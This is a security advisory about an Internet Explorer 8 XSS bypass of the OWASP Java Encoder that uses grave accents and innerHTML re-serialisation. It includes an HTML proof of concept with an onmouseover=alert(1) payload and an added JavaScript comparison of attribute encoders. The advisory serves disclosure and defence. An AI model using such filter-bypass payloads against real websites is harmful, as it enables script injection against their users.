OWASP Java Encoder Filter Bypass

06 Nov 2013 | Reported by Rafay Baloch | Type: packetstorm | Source: packetstormsecurity.com

OWASP Java Encoder XSS Bypass Vulnerability

#Product: OWASP Java Encoder
#Vulnerability: Mutation Based XSS Bypass
#Impact: Medium/Limited
#Authors: Rafay Baloch And Alex Infuhr
#Company: RHAinfoSEC
#Website: http://services.rafayhackingarticles.net
#Status: To be fixed in the next release

=========
Description
=========
  
OWASP Java Encoder is an encoding library that attempts to protect a website's users by encoding untrusted input before it is reflected back into the page.
  
=========
Vulnerability
=========
  
The issue occurs only in Internet Explorer, because IE treats the grave accent (`) as an attribute delimiter. In an unpatched IE 8 we can break out of a valid attribute, since the browser does not put double quotes around our vector when the markup is returned via the innerHTML property.
  
=============
Proof of concept
=============
  
Here is the POC, obtained by slightly modifying example #59 at html5sec.org.

The POC was tested in Internet Explorer version 8:
<html>  
<head>  
</head>  
<div id="a"><input value="``onmouseover=alert(1)"></div>  
<div id="b"></div>  
<script>b.innerHTML=a.innerHTML</script>  
</html>  
  
Attacker's Input:
  
``onmouseover=alert(1)  
  
Vulnerable Browser's Output:
  
<div id="a"><input value=``onmouseover=alert(1)></div>  
  
Patched Browser's Output:
  
<div id="a"><input value="``onmouseover=alert(1)"></div>  
  
When the above POC is run in an unpatched Internet Explorer 8, IE 8 does not place quotes around the value when it is rendered through the innerHTML property. In a patched version of Internet Explorer, however, double quotes are placed around the string when it is returned to the user, which stops the attack.
  
===
Fix
===
  
Currently, I am not aware of any solution other than stripping out the grave accent character; encoding doesn't seem to solve the problem here.
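As an added example (not code from the advisory or from the OWASP Java Encoder project), the JavaScript below puts a classic five-character attribute encoder beside a strict one that hex-encodes every non-alphanumeric character, grave accent included, and checks whether each result would stay inert if a browser dropped the quotes around the attribute; isSafeUnquoted is an assumed helper name.

```javascript
// Added example (not code from the advisory or from the OWASP Java Encoder
// project). Two HTML-attribute encoders side by side, plus a check that asks
// the question the advisory raises: would this value still be inert if the
// browser re-serialised the attribute without its quotes?

// "Classic" encoder: the five characters most 2013-era encoders handled.
const CLASSIC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function encodeAttrClassic(value) {
  return String(value).replace(/[&<>"']/g, (c) => CLASSIC[c]);
}

// Strict encoder in the style of the OWASP XSS Prevention Cheat Sheet's
// attribute rule: keep ASCII letters and digits, hex-encode everything else,
// grave accent included. Nothing is left that a browser could read as an
// attribute delimiter or separator, quotes or no quotes.
function encodeAttrStrict(value) {
  return Array.from(String(value), (ch) => {
    if (/^[A-Za-z0-9]$/.test(ch)) return ch;
    const hex = ch.codePointAt(0).toString(16).padStart(2, '0');
    return `&#x${hex};`;
  }).join('');
}

// Assumed helper name. Returns true when the encoded value contains no
// whitespace and none of the characters that can terminate or delimit an
// unquoted attribute (quotes, grave accent, <, >, =), so it cannot spill
// into a new attribute even if the surrounding quotes are dropped.
function isSafeUnquoted(encoded) {
  return !/[\s"'`<>=]/.test(encoded);
}

// The advisory's payload, reflected into <input value="..."> by each encoder.
const PAYLOAD = '``onmouseover=alert(1)';
const classicOut = encodeAttrClassic(PAYLOAD);
const strictOut = encodeAttrStrict(PAYLOAD);

console.log('classic:', `<input value="${classicOut}">`, 'safe unquoted?', isSafeUnquoted(classicOut));
console.log('strict :', `<input value="${strictOut}">`, 'safe unquoted?', isSafeUnquoted(strictOut));
```

The classic encoder returns the payload unchanged, because none of its five characters occur in it; the strict encoder leaves no grave accent for IE 8 to treat as a delimiter.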
  
==========
References
==========
  
http://html5sec.org/#59  
http://www.slideshare.net/x00mario/the-innerhtml-apocalypse  
https://cure53.de/fp170.pdf  
